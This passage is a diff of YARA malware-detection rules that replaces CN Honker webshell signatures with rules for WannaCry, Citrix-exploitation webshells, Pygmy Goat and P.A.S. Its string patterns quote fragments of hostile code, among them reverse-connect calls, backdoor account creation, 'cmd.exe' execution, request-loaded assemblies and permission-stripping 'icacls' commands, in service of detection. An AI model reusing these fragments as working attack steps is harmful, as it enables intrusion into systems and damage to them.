-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_SECRETSAUCE_Jul23_1 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php1.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
-		date = "2015-06-23"
+		description = "Detects SECRETSAUCE PHP webshells (found after an exploitation of Citrix NetScaler ADC CVE-2023-3519)"
+		author = "Florian Roth"
+		id = "db0542e7-648e-5f60-9838-e07498f58b51"
+		date = "2023-07-24"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L742-L758"
+		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L79-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c2f4b150f53c78777928921b3a985ec678bfae32"
-		logic_hash = "aadf47ac6231b41e720efdd85c481ebac8fccb572e57b86b27a95dd367c0d81b"
-		score = 70
+		logic_hash = "c762d46ae43a3e10453c2ee17039812a06086ac85bdb000cf8308f5196a9dee2"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii
-		$s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii
-		$s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii
+		$sa1 = "for ($x=0; $x<=1; $x++) {" ascii
+		$sa2 = "$_REQUEST[" ascii
+		$sa3 = "@eval" ascii
+		$sb1 = "public $cmd;" ascii
+		$sb2 = "return @eval($a);" ascii
+		$sb3 = "$z->run($z->get('openssl_public_decrypt'));"
 
 	condition:
-		filesize < 621KB and all of them
+		filesize < 100KB and ( all of ( $sa* ) or 2 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell2 : FILE
+rule SIGNATURE_BASE_Wannacry_Ransomware : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jspshell2.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
-		date = "2015-06-23"
+		description = "Detects WannaCry Ransomware"
+		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
+		id = "2e46b4db-8c94-53ed-ae27-31dd37b04940"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L760-L775"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L12-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cc7bc1460416663012fc93d52e2078c0a277ff79"
-		logic_hash = "3a60991fa557655fbd2450739976ac612a0ea2a3df22873382b05438cac12762"
-		score = 70
-		quality = 85
+		logic_hash = "a652444d7946dbbc4fae76cd01f2e20993999fd1e6fc48a9ac0da57aab87a2da"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 
 	strings:
-		$s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii
-		$s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii
+		$x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
+		$x2 = "taskdl.exe" fullword ascii
+		$x3 = "tasksche.exe" fullword ascii
+		$x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii
+		$x5 = "WNcry@2ol7" fullword ascii
+		$x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
+		$x7 = "mssecsvc.exe" fullword ascii
+		$x8 = "C:\\%s\\qeriuwjhrf" fullword ascii
+		$x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
+		$s1 = "C:\\%s\\%s" fullword ascii
+		$s2 = "<!-- Windows 10 --> " fullword ascii
+		$s3 = "cmd.exe /c \"%s\"" fullword ascii
+		$s4 = "msg/m_portuguese.wnry" fullword ascii
+		$s5 = "\\\\192.168.56.20\\IPC$" fullword wide
+		$s6 = "\\\\172.16.99.5\\IPC$" fullword wide
+		$op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }
+		$op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }
+		$op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }
+		$op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }
+		$op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }
+		$op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }
 
 	condition:
-		filesize < 424KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) and 1 of ( $s* ) or 3 of ( $op* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mysql : FILE
+rule SIGNATURE_BASE_Wannacry_Ransomware_Gen : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mysql.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fa0627fb-a40c-5856-ae78-17d33910878f"
-		date = "2015-06-23"
+		description = "Detects WannaCry Ransomware"
+		author = "Florian Roth (Nextron Systems) (based on rule by US CERT)"
+		id = "d28d3d76-9c24-5476-9a0c-936c17477d6a"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L777-L791"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L48-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8e242c40aabba48687cfb135b51848af4f2d389d"
-		logic_hash = "bde2ea1ccfc88138456a1b255a32a7323f5ef0f677499db6dc6670987cc37585"
-		score = 70
+		logic_hash = "8f81c918dc1e2c8ef2e334ae504f88b10aef9e54a64486061d45296d2d738aab"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
+		hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
+		hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"
 
 	strings:
-		$s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
-		$s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
+		$s1 = "__TREEID__PLACEHOLDER__" ascii
+		$s2 = "__USERID__PLACEHOLDER__" ascii
+		$s3 = "Windows for Workgroups 3.1a" fullword ascii
+		$s4 = "PC NETWORK PROGRAM 1.0" fullword ascii
+		$s5 = "LANMAN1.0" fullword ascii
 
 	condition:
-		filesize < 202KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php9 : FILE
+rule SIGNATURE_BASE_Wanncry_M_Vbs : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php9.txt"
+		description = "Detects WannaCry Ransomware VBS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c8cbee10-78ea-5a6f-9c80-7e51a9c38440"
-		date = "2015-06-23"
+		id = "a8f13bd2-984d-5c8c-ac53-7d442e222850"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L793-L807"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cd3962b1dba9f1b389212e38857568b69ca76725"
-		logic_hash = "bea117862ebc9220a4d9aee091c808274f9907fceb83b528055998ddcc90aa5f"
-		score = 70
+		logic_hash = "e4606834535b4cad2e0d4a9bf6519fc4d749422fa4920f91fed9147ccfdff090"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
 
 	strings:
-		$s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii
+		$x1 = ".TargetPath = \"C:\\@" ascii
+		$x2 = ".CreateShortcut(\"C:\\@" ascii
+		$s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
 
 	condition:
-		filesize < 1087KB and all of them
+		( uint16( 0 ) == 0x4553 and filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp : FILE
+rule SIGNATURE_BASE_Wanncry_BAT : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp.txt"
+		description = "Detects WannaCry Ransomware BATCH File"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
-		date = "2015-06-23"
+		id = "0929f0de-28ac-5534-a6fd-7b131abda011"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L809-L823"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L85-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "65e8e4d13ad257c820cad12eef853c6d0134fce8"
-		logic_hash = "98f279c3e50308f67f88ecf8459943187ea152664fe0206c4a7d3435242df2a6"
-		score = 70
+		logic_hash = "472c6aa0f1b5229d639ef347ea39947d3fd292cda3c4086e29a19b64daad4f3f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
 
 	strings:
-		$s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii
+		$s1 = "@.exe\">> m.vbs" ascii
+		$s2 = "cscript.exe //nologo m.vbs" fullword ascii
+		$s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
+		$s4 = "echo om.Save>> m.vbs" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them
+		( uint16( 0 ) == 0x6540 and filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx3 : FILE
+rule SIGNATURE_BASE_Wannacry_Ransomnote : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx3.txt"
+		description = "Detects WannaCry Ransomware Note"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f835136-744a-5324-a1f4-02d1cfa2cab6"
-		date = "2015-06-23"
+		id = "65ce8faf-0981-5382-bc15-f094ccaa9f54"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L825-L840"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dd61481771f67d9593214e605e63b62d5400c72f"
-		logic_hash = "11bf511ee70ff4bde0a9320cb80dd9efa0f437d432c78a859153cfcc8e80db01"
-		score = 70
+		logic_hash = "da814848f4616166bd7b92fa1d55a54b565fa8e6036cb895e5795448e989a99d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
 
 	strings:
-		$s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii
-		$s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii
+		$s1 = "A:  Don't worry about decryption." fullword ascii
+		$s2 = "Q:  What's wrong with my files?" fullword ascii
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0x3a51 and filesize < 2KB and all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Shell_Shell : FILE
+rule SIGNATURE_BASE_APT_Lazaruswannacry : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file shell.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8fbcae22-07b7-5afe-9f15-06e2f426b5ca"
-		date = "2015-06-23"
+		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
+		author = "Costin G. Raiu, Kaspersky Lab"
+		id = "e9dd9750-2366-503a-a879-972dbead6bf3"
+		date = "2017-05-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L842-L857"
+		reference = "https://twitter.com/neelmehta/status/864164081116225536"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L121-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1816006827d16ed73cefdd2f11bd4c47c8af43e4"
-		logic_hash = "ac22d89353b4316289bf6c6e13332ac401f4b57f6c29b71861cb48359c1e55f9"
-		score = 70
+		hash = "9c7c7149387a1c79679a87dd1ba755bc"
+		hash = "ac21c8ad899727137c4b94458d7aa8d8"
+		logic_hash = "8b32f1ea45a346088a18761540df3387997b53ea853f7a53cd292c9224f11209"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii
-		$s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii
+		$a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
+         04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46
+         56 E8 }
+		$a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
+         10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
+         30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
+         38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
+         44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
+         68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
+         FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
+         08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
+         10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
+         2B C0 2C C0 FF FE }
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 15000000 and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Php1_Php7_Php9 : FILE
+rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_AES_Key : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files php1.txt, php7.txt, php9.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cfc2f624-976f-5ff6-bd07-10948b9290bc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L859-L878"
+		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the Pygmy Goat AES key built on the stack or in data"
+		author = "NCSC"
+		id = "62be3f4f-b435-54b2-b596-4ad01606edb8"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ea5b362f8d8f2e99725d4dd4d2ada5c3939a45a3dde0084571600452ab4673c"
-		score = 70
-		quality = 85
+		logic_hash = "da6c5d7a03eab01ddbb460cbdd16622839b3a52cfa4e91f169d3d477c60cfed4"
+		score = 75
+		quality = 69
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "c2f4b150f53c78777928921b3a985ec678bfae32"
-		hash1 = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
-		hash2 = "cd3962b1dba9f1b389212e38857568b69ca76725"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii
-		$s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
-		$s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
+		$dword_1 = { 59 4b 6e 77 }
+		$dword_2 = { 51 6a 6d 41 }
+		$dword_3 = { 54 62 41 6e }
+		$dword_4 = { 52 6f 5a 6d }
+		$dword_5 = { 30 66 47 37 }
+		$dword_6 = { 55 5a 57 62 }
+		$dword_7 = { 32 59 55 78 }
+		$dword_8 = { 55 51 50 77 }
 
 	condition:
-		filesize < 300KB and all of them
+		uint32( 0 ) == 0x464c457f and all of them and filesize < 4MB
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Serv_U_By_Goldsun_Asp3_Serv_U_Asp : FILE
+rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_Magic_Strings : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files Serv-U_by_Goldsun.asp, asp3.txt, Serv-U asp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e91e05e8-0f6d-57a7-a649-a834733f17c8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L880-L899"
+		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the magic byte sequences used in C2 communications."
+		author = "NCSC"
+		id = "7df6c228-d569-5f1c-8bbb-4194347f99d1"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L26-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b733e80f234a85a4f65eedd94f535860b4da464adb80a91afc547a8d96b5dc7a"
-		score = 70
+		logic_hash = "df40e818002a72ee649dd2bb79cb59938dc108690cce03c99a72fc036406c4b2"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
-		hash1 = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
-		hash2 = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii
-		$s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii
-		$s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
+		$c2_magic_handshake = ",bEB3?=o"
+		$fake_ssh_banner = "SSH-2.0-D8pjE"
+		$fake_ed25519_key = { 29 cc f0 cc 16 c5 46 6e 52 19 82 8e 86
+      65 42 8c 1f 1a d4 c3 a5 b1 cb fc c0 26 6c 31 3c 5c 90 3a 24 7d e4 d3 57
+      6d da 8e cb f4 66 d1 cb 81 4f 63 fd 4a fa 06 e4 7e 4c a0 95 91 bd cb 97
+      a4 b3 0f }
 
 	condition:
-		filesize < 444KB and all of them
+		uint32( 0 ) == 0x464c457f and any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Asp4_Asp4_MSSQL__MSSQL_ : FILE
+rule SIGNATURE_BASE_MAL_Earthworm_Socks_Proxy_ID_Generation : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files asp4.txt, asp4.txt, MSSQL_.asp, MSSQL_.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e0070f0d-35d0-5024-88e7-e0e04b29f485"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L901-L921"
+		description = "Detects EarthWorm - a reverse socks proxy used by the threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. The detection is based on the pool num generation x86 assembly."
+		author = "NCSC"
+		id = "242777e4-3abb-50d8-8c45-746cc4a8b1f8"
+		date = "2024-10-22"
+		modified = "2024-12-12"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L46-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8ec5ad87c83c16f47391c3ce08cee74c6be1e42c288eec6d1559867d28489c6"
-		score = 70
+		logic_hash = "6837cba2637ed02d1d620c037b200d528c09a39498c1e320873a3a244e67932c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "4005b83ced1c032dc657283341617c410bc007b8"
-		hash1 = "4005b83ced1c032dc657283341617c410bc007b8"
-		hash2 = "7097c21f92306983add3b5b29a517204cd6cd819"
-		hash3 = "7097c21f92306983add3b5b29a517204cd6cd819"
+		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
 
 	strings:
-		$s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii
-		$s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
-		$s2 = "Set Conn = Nothing " fullword ascii
+		$chartoi = {
+         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
+         c1 e0 07 // SHL EAX,0x7
+         89 c1 // MOV ECX,EAX
+         8b 55 ?? // MOV EDX,dword ptr [EBP + ??]
+         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
+         01 d0 // ADD EAX,EDX
+         0f b6 00 // MOVZX EAX,byte ptr [EAX]
+         0f be c0 // MOVSX EAX,AL
+         01 c8 // ADD EAX,ECX
+         89 45 ?? // MOV dword ptr [EBP + ??],EAX
+         83 6d ?? 01 // SUB dword ptr [EBP + ??],0x1
+      }
 
 	condition:
-		filesize < 341KB and all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Injection_Jmcook_Jmpost_Manualinjection : FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files Injection.exe, jmCook.asp, jmPost.asp, ManualInjection.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e154ecb5-9d56-520a-b76a-635a8864f0a8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L923-L942"
+		description = "Detects P.A.S. PHP webshell - Based on DHS/FBI JAR-16-2029 (Grizzly  Steppe)"
+		author = "FR/ANSSI/SDO (modified by Florian Roth)"
+		id = "862aab77-936e-524c-8669-4f48730f4ed5"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_centreon.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f3a4f81326154a6a6ac448d18be29ad534917bc39aba26cc458f06b43001681"
+		logic_hash = "977ee0fdf0e92ccea6b71fea7b2c7aed2965c6966d8af86230ccb0f95b286694"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
-		hash1 = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
-		hash2 = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
-		hash3 = "e83d427f44783088a84e9c231c6816c214434526"
 
 	strings:
-		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
-		$s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
+		$php = "<?php"
+		$strreplace = "(str_replace("
+		$md5 = ".substr(md5(strrev($"
+		$gzinflate = "gzinflate"
+		$cookie = "_COOKIE"
+		$isset = "isset"
 
 	condition:
-		filesize < 7342KB and all of them
+		( filesize > 20KB and filesize < 200KB ) and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cmfshell : FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Ziparchivefile
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file cmfshell.cmf"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c5670deb-952c-5ba4-949a-097cc09bb108"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L944-L959"
+		description = "Detects an archive file created by P.A.S. for download operation"
+		author = "FR/ANSSI/SDO (modified by Florian Roth)"
+		id = "081cc65b-e51c-59fc-a518-cd986e8ee2f7"
+		date = "2021-02-15"
+		modified = "2024-05-25"
